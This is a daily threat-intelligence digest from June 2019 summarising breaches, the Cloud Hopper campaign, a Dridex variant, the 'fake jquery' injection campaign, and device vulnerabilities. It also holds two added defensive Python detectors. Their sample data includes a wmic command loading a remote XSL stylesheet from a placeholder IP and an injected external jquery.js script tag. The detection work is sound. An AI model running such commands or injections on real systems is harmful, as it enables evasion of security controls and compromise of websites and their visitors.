Cyware Daily Threat Intelligence, June 28, 2019

Trade and technology secrets are valuable assets for every public and private organization, and attackers have long hunted for them. New details about the global hacking campaign dubbed Cloud Hopper have emerged in the past 24 hours. Eight of the world’s biggest technology service providers are now known to have fallen victim to the campaign, which was allegedly carried out by Chinese hackers seeking to steal commercial secrets. The affected victims include Fujitsu, Tata Consultancy Services, and DXC, among others.

The cybercrime group that went after India-based Wipro and several other IT service providers has also breached PCM, a US-based technology solutions provider. The attackers obtained client data that could be used for gift card fraud. The past 24 hours also saw a major data leak at MedicareSupplement.com, an insurance marketing website, which exposed almost 5 million records through a misconfigured MongoDB database.

In another incident, security researchers have discovered a new variant of the Dridex trojan that uses an application whitelisting bypass to avoid detection by antivirus products.

Top Breaches Reported in the Last 24 Hours

PCM breached
Attackers breached PCM to obtain client data that could be used for gift card fraud. The firm became aware of the unusual activity in mid-May 2019 and launched an investigation, which found that the incident affected a very limited number of customers.

Updates on ‘Cloud Hopper’ attack
Six more technology service providers have been found to have fallen victim to the ‘Cloud Hopper’ attack: Fujitsu, Tata Consultancy Services, NTT Data, Dimension Data, Computer Sciences Corporation, and DXC Technology. The attack was allegedly carried out by Chinese hackers with the aim of stealing corporate assets and trade secrets.

5 million user records exposed
An unprotected MongoDB database belonging to MedicareSupplement.com exposed almost 5 million user records. The database, reachable without authentication, contained personal information such as names, addresses, dates of birth, gender, email addresses, and IP addresses. After being notified, the insurance marketing firm took the database offline.

Attunity Ltd. exposes clients’ files
Attunity Ltd. exposed its clients’ internal documents through three publicly accessible Amazon S3 buckets, named “attunity-it”, “attunity-patch” and “attunity-support”. They contained about a terabyte of files, including 750 gigabytes of compressed email backups. Attunity disabled public access to the buckets after the issue was reported.

$27 million cryptocurrency stolen
Fraudsters have stolen $27 million using a spoofed Blockchain.com website. As many as 4,000 users across the globe have fallen victim to the attack. The fake site captured the login credentials of cryptocurrency users, which the perpetrators then used to drain the funds in the victims’ wallets on the platform.
 
Top Malware Reported in the Last 24 Hours

New Dridex trojan variant
A new variant of the Dridex trojan has been found using an application whitelisting bypass to avoid detection by antivirus products. The technique abuses the WMI command-line utility (wmic.exe), a trusted, signed Windows binary that will execute script embedded in an XSL stylesheet handed to it, so the malicious code runs under a whitelisted process. Apart from evading detection, the variant has also reworked how it loads its libraries, using DLL file names that legitimate Windows executables load so that the malicious library is picked up by a trusted process.
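Detection logic for the wmic.exe XSL behaviour described above, as an added example that is not part of the original digest or of the researchers’ report. It runs over a simplified, assumed pipe-separated process-creation log (timestamp|parent|image|command line) rather than any real EDR schema; the sample events are constructed. The rule treats WMIC’s stock format keywords as benign and flags a /FORMAT value that is a file path, a non-standard .xsl name, or a URL/UNC location, raising the severity when the stylesheet is remote or wmic.exe was spawned by an Office application.

```python
"""Flag process-creation events in which wmic.exe is handed an XSL stylesheet
through its /FORMAT switch, the whitelisting-bypass behaviour described above.

Added example for this digest, not code from the original report. The log
lines are constructed and the pipe-separated layout
(timestamp|parent|image|command line) is an assumed simplified format, not
the schema of any particular EDR or Sysmon deployment.
"""
import re
from typing import Dict, List, Optional

# Constructed sample telemetry: two benign wmic invocations, a local XSL
# spawned from Word, a remote XSL fetched over HTTPS, and an unrelated process.
SAMPLE_EVENTS: List[str] = [
    r'2019-06-28T09:12:01Z|explorer.exe|C:\Windows\System32\wbem\WMIC.exe|wmic os get caption',
    r'2019-06-28T09:12:40Z|cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic product get name /format:csv',
    r'2019-06-28T09:13:44Z|WINWORD.EXE|C:\Windows\System32\wbem\WMIC.exe|wmic process list /FORMAT:"C:\Users\Public\update.xsl"',
    r'2019-06-28T09:14:10Z|cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic os get /format:"https://203.0.113.5/s.xsl"',
    r'2019-06-28T09:15:30Z|services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs',
]

# Format keywords WMIC ships with; each maps to a stylesheet under
# %SystemRoot%\System32\wbem, so these are the expected, benign values.
BUILTIN_FORMATS = {
    "csv", "hform", "htable", "htable-sortby", "list", "mof", "rawxml",
    "table", "texttable", "textvaluelist", "value", "xml",
}

# Parents that should never be driving wmic.exe into a stylesheet.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# /FORMAT:"quoted value" or /FORMAT:bare-token, case-insensitive.
FORMAT_RE = re.compile(r'/format:\s*(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    ts, parent, image, cmdline = line.split("|", 3)
    return {"ts": ts, "parent": parent, "image": image, "cmdline": cmdline}


def xsl_format_target(cmdline: str) -> Optional[str]:
    """Return the value given to /FORMAT, or None if the switch is absent."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def classify_format_target(value: str) -> Optional[str]:
    """'remote' for URL/UNC stylesheets, 'local' for a file path or a
    non-built-in .xsl name, None for a stock format keyword."""
    v = value.strip().lower()
    if re.match(r"^(https?|ftp)://", v) or v.startswith("\\\\"):
        return "remote"
    base = v[:-4] if v.endswith(".xsl") else v
    if base.split(":", 1)[0] in BUILTIN_FORMATS:  # also allows htable-sortby:Name
        return None
    if "\\" in v or "/" in v or v.endswith(".xsl"):
        return "local"
    return None


def detect_wmic_xsl(events: List[str]) -> List[Dict[str, str]]:
    """Run the rule over raw log lines and return one finding per hit."""
    findings = []
    for line in events:
        ev = parse_event(line)
        image_name = ev["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if image_name != "wmic.exe":
            continue
        target = xsl_format_target(ev["cmdline"])
        if target is None:
            continue
        kind = classify_format_target(target)
        if kind is None:
            continue
        severity = "high" if kind == "remote" else "medium"
        if ev["parent"].lower() in OFFICE_PARENTS:
            severity = "high"  # document-spawned wmic is the maldoc delivery shape
        findings.append({
            "ts": ev["ts"], "parent": ev["parent"], "target": target,
            "kind": kind, "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for f in detect_wmic_xsl(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['ts']} parent={f['parent']} {f['kind']} xsl -> {f['target']}")
```

On the constructed events the rule ignores the plain `wmic os get caption` and the `/format:csv` call, and reports the Word-spawned local stylesheet and the HTTPS-hosted one. Matching on the image name alone would miss a renamed copy of wmic.exe, so in production the same logic should key on the original file name or signer recorded by the sensor rather than on the path.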

‘Fake jquery’ campaign
Thousands of websites have been compromised in a newly found ‘fake jquery’ campaign. The compromised sites are injected with a reference to an external JavaScript file called jquery.js, a name chosen to blend in with the legitimate jQuery library. The end goal of the campaign is to trick users into installing rogue apps and to monetize via full-screen adverts.
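A check a site owner could run against their own pages for the injection pattern described above, as an added example that is not part of the original digest or of the researchers’ report. It collects every `<script src>` on a page and flags jQuery-named files loaded from a host that is neither the page’s own origin nor one of an assumed allowlist of jQuery CDNs (`KNOWN_JQUERY_HOSTS`, which a real deployment would replace with the CDNs its sites actually use). The sample HTML and the injected host are constructed.

```python
"""Audit a page's <script src> references for jQuery-named files pulled from
hosts that are neither the page's own origin nor a known jQuery CDN, the
injection pattern used by the 'fake jquery' campaign above.

Added example for this digest, not code from the original report. The sample
HTML is constructed, and KNOWN_JQUERY_HOSTS is an assumed allowlist that a
real deployment would replace with the CDNs its sites are actually meant to use.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlparse

# Assumed allowlist of hosts from which a jQuery file is expected.
KNOWN_JQUERY_HOSTS = {
    "code.jquery.com",
    "ajax.googleapis.com",
    "cdnjs.cloudflare.com",
    "cdn.jsdelivr.net",
}

# jquery.js, jquery.min.js, jquery-3.4.1.min.js, ...
JQUERY_NAME_RE = re.compile(r"^jquery[\w.-]*\.js$", re.IGNORECASE)

# Constructed page: a same-origin copy, a CDN copy, an ordinary same-origin
# script, and one injected 'jquery.js' from an unrelated host.
SAMPLE_HTML = """<!doctype html>
<html><head>
<script src="/assets/js/jquery-3.4.1.min.js"></script>
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script src="https://www.example.com/assets/js/site.js"></script>
<script type="text/javascript" src="//stats.js-assets.example.net/jquery.js"></script>
</head><body>
<script>document.write('inline, no src');</script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Collect every src attribute found on <script> tags."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: List[str] = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value.strip())


def script_sources(html: str) -> List[str]:
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.srcs


def suspicious_jquery_refs(html: str, page_url: str) -> List[Dict[str, str]]:
    """Return jQuery-named scripts loaded from hosts we do not expect."""
    page_host = (urlparse(page_url).hostname or "").lower()
    findings = []
    for src in script_sources(html):
        u = urlparse(src)  # handles absolute, protocol-relative and path-only srcs
        host = (u.hostname or "").lower()
        if not host or host == page_host:
            continue  # same-origin: not the external injection we are looking for
        filename = u.path.rsplit("/", 1)[-1]
        if not JQUERY_NAME_RE.match(filename):
            continue
        if host in KNOWN_JQUERY_HOSTS:
            continue
        findings.append({"src": src, "host": host, "file": filename})
    return findings


if __name__ == "__main__":
    for f in suspicious_jquery_refs(SAMPLE_HTML, "https://www.example.com/"):
        print(f"suspicious jQuery reference: {f['src']} (host {f['host']})")
```

On the constructed page only the protocol-relative `//stats.js-assets.example.net/jquery.js` is reported; the same-origin and code.jquery.com copies pass. The check is deliberately narrow (it keys on the file name the campaign imitates), so it complements rather than replaces an integrity baseline of every external script a site is expected to load.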

Malicious Android game collects data
Researchers have identified a malicious version of ‘Scary Granny ZOMBY Mod: The Horror Game 2019’ on the Google Play Store. The app is used to collect the login credentials of Google account users. Once installed, it displays full-screen ads and asks victims to pay $22 to access the game. For some users, the app shows a fake login page that mimics the Google ‘Sign In’ page.

ATMJaDi malware
A new ATM malware sample named ATMJaDi has been uncovered cashing out money from ATMs. The sample was uploaded to a multi-scanner service from Mexico and Colombia. Once installed, the malware looks for the process that controls the ATM, a Java archive file called INJX_PURE.jar, and, when it finds it, injects itself into that process and gains control of the ATM.

Top Vulnerabilities Reported in the Last 24 Hours

Ultraloq flaws
An API bug in the Ultraloq keyless smart door lock made by U-tec can allow attackers to find the physical address where a device is installed, as well as steal data and impersonate any user. A second issue in Ultraloq’s Bluetooth Low Energy (BLE) implementation can allow attackers to open the lock with a brute-force credential attack.

Insulin pumps recalled due to vulnerabilities
The US Food and Drug Administration has warned that certain Medtronic Plc insulin pumps have been recalled following the discovery of security issues. The flaws could allow an attacker to connect wirelessly to a nearby insulin pump and change its settings to control insulin delivery.

Top Scams Reported in the Last 24 Hours

New Instagram phishing scam
Scammers are stealing Instagram credentials and users’ personal information in a new phishing scam that targets users seeking verified accounts. The scammers use a page that masquerades as the real Instagram verification submission page and prompts victims to apply for verification through a fake domain named Instagramforbusiness[.]info. The phishing form on that domain asks victims for their login credentials and other personal details.

